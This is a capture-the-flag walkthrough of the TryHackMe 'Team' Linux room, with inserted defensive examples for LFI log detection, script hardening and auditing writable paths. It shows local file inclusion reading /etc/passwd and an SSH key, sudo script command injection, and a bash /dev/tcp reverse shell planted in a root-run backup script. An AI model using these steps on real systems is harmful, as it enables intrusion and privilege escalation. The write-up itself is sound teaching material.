Tryhackme – Team

In this walkthrough, we will be going through the Team room from Tryhackme. This room is rated as Easy on the platform and consists of enumeration, exploitation and privilege escalation of a Linux boot2root machine. So, let’s get started without any delay.


Machine Info:

Objective: Beginner friendly boot2root machine


  • I started off with a regular nmap scan and found ports 21 (FTP), 22 (SSH) and 80 (HTTP) open.

wh1terose@fsociety:~$ sudo nmap -sS -sV

Nmap scan report for
Host is up (0.24s latency).
Not shown: 997 filtered ports
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 27.63 seconds

nmap scan

  • Enumerated the website running on port 80 and found a default Apache2 page.

Apache2 Ubuntu Default Page

  • Next, I fired up gobuster on it but found nothing useful.

wh1terose@fsociety:~$ gobuster dir -u -w ~/Desktop/Wordlist/common.txt 
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2023/11/28 21:14:22 Starting gobuster in directory enumeration mode
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 11366]
/server-status        (Status: 403) [Size: 278]  
2023/11/28 21:16:02 Finished

gobuster scan

  • I also tried logging into the FTP server using anonymous credentials but had no luck.

ftp anonymous login attempt

  • Next, I checked the source code of the default Apache2 page on port 80 and found text in the title mentioning a domain name called team.thm, with an instruction to add it to our hosts file.

Page source

  • So, I added the domain to my hosts file and was able to access the website running on it.

sudo nano /etc/hosts


Teams Site

  • Next, I fired gobuster again on the new domain and found some pretty interesting results: /robots.txt and the /scripts and /assets directories.

wh1terose@fsociety:~/CTF/TryHackme/Team$ gobuster dir -u http://team.thm/ -w ~/Desktop/Wordlist/common.txt 
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://team.thm/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2023/11/28 21:42:38 Starting gobuster in directory enumeration mode
/.hta                 (Status: 403) [Size: 273]
/.htaccess            (Status: 403) [Size: 273]
/.htpasswd            (Status: 403) [Size: 273]
/assets               (Status: 301) [Size: 305] [--> http://team.thm/assets/]
/images               (Status: 301) [Size: 305] [--> http://team.thm/images/]
/index.html           (Status: 200) [Size: 2966]                             
/robots.txt           (Status: 200) [Size: 5]                                
/scripts              (Status: 301) [Size: 306] [--> http://team.thm/scripts/]
/server-status        (Status: 403) [Size: 273]                     

2023/11/28 21:44:17 Finished

gobuster scan

  • I first checked robots.txt and found a potential username – dale.


  • Next, I tried the /scripts directory; however, access was denied, and the same went for the /assets directory.

Forbidden error

  • I fired gobuster again, this time on the scripts directory with the extensions .txt and .js, to reveal some juicy files which we might be able to access, and got a hit for script.txt.

wh1terose@fsociety:~/Desktop/Wordlist$ gobuster dir -u http://team.thm/scripts/ -w ~/Desktop/Wordlist/common.txt -x txt,js
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://team.thm/scripts/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,js
[+] Timeout:                 10s
2023/11/28 22:35:05 Starting gobuster in directory enumeration mode
/.hta                 (Status: 403) [Size: 273]
/.hta.txt             (Status: 403) [Size: 273]
/.hta.js              (Status: 403) [Size: 273]
/.htaccess.js         (Status: 403) [Size: 273]
/.htpasswd.txt        (Status: 403) [Size: 273]
/.htaccess            (Status: 403) [Size: 273]
/.htaccess.txt        (Status: 403) [Size: 273]
/.htpasswd.js         (Status: 403) [Size: 273]
/.htpasswd            (Status: 403) [Size: 273]
/script.txt           (Status: 200) [Size: 597]
2023/11/28 22:40:02 Finished

gobuster scan

  • The script.txt file contains a script that is responsible for the FTP login; however, the creds were REDACTED. But the notes section mentions that an old copy of the script is still lying on the server with the creds in it and has an extension of “.old”.


  • Downloaded the file and got our FTP user’s credentials.


cat script.old


  • Next, I logged into the FTP server and downloaded the New_site.txt file, in which the user Gyles had told Dale that he was working on a PHP website which is in development and can be found at .dev. Along with that, he had asked him to make a copy of his id_rsa file in the relevant config file.

wh1terose@fsociety:~/CTF/TryHackme/Team$ ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( ftpuser
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    2 65534    65534        4096 Jan 15  2021 workshare
226 Directory send OK.
ftp> cd workshare
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 1002     1002          269 Jan 15  2021 New_site.txt
226 Directory send OK.
ftp> get New_site.txt
local: New_site.txt remote: New_site.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for New_site.txt (269 bytes).
226 Transfer complete.
269 bytes received in 0.00 secs (135.3402 kB/s)
ftp> exit
221 Goodbye.

ftp login

cat New_site.txt

  • I first added the domain to my /etc/hosts file to access it.

sudo nano /etc/hosts


Initial Access:

  • The script page endpoint calls for a page named teamshare.php. I checked the endpoint for LFI, got lucky, and was able to dump the contents of the /etc/passwd file.


/etc/passwd file

  • Next, I used the LFI to get the user flag.

user flag

  • As per the hint given by Gyles regarding the id_rsa file, I checked the sshd_config for this and got Dale’s private key in it.

sshd_config file


  • Logged into the server via SSH using dale’s private key.

ssh login dale
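
The file reads in this section leave a trace in the web server's access log. As an added example (not part of the original walkthrough), this shell function flags requests whose page parameter holds an absolute path or a ../ sequence. The /script.php?page= URL shape, the combined log format and the sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: flag requests whose "page" query parameter points outside
# the web application's own directory (a sign of local file inclusion).
# Assumptions: Apache combined log format, parameter named "page".

# Constructed sample log lines (documentation IP ranges, not from the room).
sample_log() {
cat <<'EOF'
203.0.113.7 - - [28/Nov/2023:22:50:01 +0000] "GET /script.php?page=teamshare.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Nov/2023:22:51:12 +0000] "GET /script.php?page=/etc/passwd HTTP/1.1" 200 1698 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Nov/2023:22:52:40 +0000] "GET /script.php?page=../../../etc/ssh/sshd_config HTTP/1.1" 200 5990 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Nov/2023:22:53:05 +0000] "GET /script.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1698 "-" "Mozilla/5.0"
198.51.100.4 - - [28/Nov/2023:22:54:00 +0000] "GET /index.html HTTP/1.1" 200 2966 "-" "Mozilla/5.0"
EOF
}

# Read log lines on stdin; print "client-ip decoded-value" for each hit.
# The value is lower-cased, and only single percent-encoding is undone.
flag_lfi() {
    awk '
    {
        # Field 7 is the request target in combined log format.
        n = split($7, parts, "?")
        if (n < 2) next
        m = split(parts[2], kv, "&")
        for (i = 1; i <= m; i++) {
            if (kv[i] !~ /^page=/) continue
            val = tolower(substr(kv[i], 6))
            gsub(/%2e/, ".", val)
            gsub(/%2f/, "/", val)
            # Absolute path or directory traversal in an include parameter.
            if (val ~ /^\// || val ~ /\.\.\//) print $1, val
        }
    }'
}

# Stand-alone run: sample_log | flag_lfi
```

On the application side, the matching fix is to map the parameter to a fixed allowlist of page names instead of passing it to an include.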

Privilege Escalation:

  • Next, I checked the sudo permissions for user dale and found out that he can run the admin_checks script as user gyles without any password.

sudo -l


  • I checked the contents of the admin_checks file and found out that it asks for the person’s name and the date to back up data. The thing to notice here is the error variable: it is declared and its value is redirected to null without any checking.

cat admin_checks

  • I generated a script with the following contents to spawn a shell.


bash -p

  • When the program asked for the date, I entered the path of our shell script, which then spawned a shell for us as user gyles.

dale@TEAM:/tmp$ sudo -u gyles /home/gyles/admin_checks
Reading stats.
Reading stats..
Enter name of person backing up the data: root
Enter 'date' to timestamp the file: /tmp/
The Date is 
python3 -c 'import pty; pty.spawn("/bin/bash")'
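
The flaw described above, as an added example that is not the room's admin_checks script: a constructed model in which the answer to the date prompt is run as a command, next to a hardened version that treats input as data only. The function names, the data.txt file and the name allowlist are assumptions for illustration.

```shell
#!/bin/sh
# Added example: constructed model of a sudo-run helper script.
# All names here (functions, data.txt) are hypothetical.

# Vulnerable model: the answer to the "date" prompt is expanded as a command
# line and run, with stderr discarded so failures go unnoticed. Under sudo,
# that command runs as the sudo target user.
backup_vulnerable() {   # $1 = name, $2 = answer to the date prompt, $3 = dir
    echo "$1" >> "$3/data.txt"
    error=$2
    $error 2>/dev/null
}

# Hardened model: input is never executed. The name must match an allowlist
# pattern, and the script produces the timestamp itself.
backup_hardened() {     # $1 = name, $2 = dir
    case $1 in
        ''|*[!A-Za-z0-9_-]*)
            echo "invalid name" >&2
            return 1 ;;
    esac
    echo "$1" >> "$2/data.txt"
    stamp=$(date "+%F-%H-%M") || return 1
    cp -- "$2/data.txt" "$2/data-$stamp.bak" || return 1
    echo "$2/data-$stamp.bak"   # path of the backup that was written
}

# Stand-alone run with a harmless command as the prompt answer:
#   d=$(mktemp -d); backup_vulnerable alice "echo EXECUTED" "$d"
#   backup_hardened alice "$d"
```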


  • I fired up linpeas on the server to reveal some privilege escalation vectors and found a backup file in /usr/local/bin; the user gyles also belongs to the “admin” group.



  • I checked the contents of the file and it is backing up some files from the web directory. The thing to notice here is that we can write to the file as we belong to the admin group. So, I changed the contents of the file to the reverse shell below.

bash -i >& /dev/tcp/ 0>&1

bash reverse shell

  • Once the script was executed, I got a connection back on my netcat listener as user root and captured the root flag.

root flag
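
The root step works because a script that root executes is writable by a non-root group. As an added example (not from the original walkthrough), this audit lists group- or world-writable files and directories under the locations root-run jobs execute from; the fixture file names are constructed.

```shell
#!/bin/sh
# Added example: find scripts that a non-owner can modify in directories
# that root-run jobs execute from. Fixture names below are hypothetical.

# Print paths under the given directories that are group- or world-writable.
# Directories count too: write access to a directory lets a user replace
# the files inside it.
tamperable_paths() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" \( -type f -o -type d \) \
            \( -perm -020 -o -perm -002 \) -print
    done
}

# Same findings with mode, owner and group shown, for review.
tamperable_report() {
    tamperable_paths "$@" | while IFS= read -r p; do
        ls -ld "$p"
    done
}

# Constructed fixture: one script writable by its group, one that is not.
make_fixture() {
    d=$(mktemp -d) || return 1
    printf '#!/bin/sh\n' > "$d/backup_job.sh"
    printf '#!/bin/sh\n' > "$d/other_job.sh"
    chmod 0775 "$d/backup_job.sh"   # group-writable, like the room's file
    chmod 0755 "$d/other_job.sh"
    echo "$d"
}

# Stand-alone run on a real host: tamperable_report /usr/local/bin
```

Anything it reports should be owned by root with group and other write access removed, unless every member of the group is meant to hold root-equivalent access.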

Task 1 – Deploy the box


Task 2 – Flags

Question 1 – user.txt

Question 2 – root.txt


So that was “Team” for you. We started off with our regular nmap scan and found three ports open – 21 (FTP), 22 (SSH) and 80 (HTTP). Next, we enumerated the web server on port 80 and found a hostname in the page title – team.thm. We added it to our /etc/hosts file and accessed the application. We fired gobuster on the server and found a scripts directory. As access was denied, we fired gobuster on that again and found a script.txt file. The file indicates the presence of an old file which has credentials in plain text. We downloaded the old script file by changing the extension to script.old and got the FTP creds of ftpuser. We logged into the FTP server using those and found a New_site.txt file. It reveals that a development server is running on the .dev subdomain. We added it to our /etc/hosts file and got access to the development server. We found an LFI vulnerability on the page endpoint and used it to dump the contents of the sshd_config file, which reveals the SSH private key of user dale. Using the private key, we got access to the server via SSH. Further, we checked the sudo permissions of user dale and found that we can run the admin_checks script as user gyles. We exploited the error variable in the admin_checks script to get a shell as user gyles. At last, we changed the contents of the backup file to our reverse shell. When it was executed, we finally got a root shell back at our netcat listener. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.

